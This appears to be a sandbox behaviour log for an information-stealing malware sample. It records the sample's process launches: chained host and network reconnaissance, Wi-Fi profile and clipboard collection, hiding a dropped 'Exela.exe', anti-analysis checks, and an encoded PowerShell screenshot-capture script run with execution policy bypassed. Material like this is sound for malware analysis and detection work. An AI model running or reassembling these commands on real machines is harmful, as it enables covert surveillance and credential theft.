            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
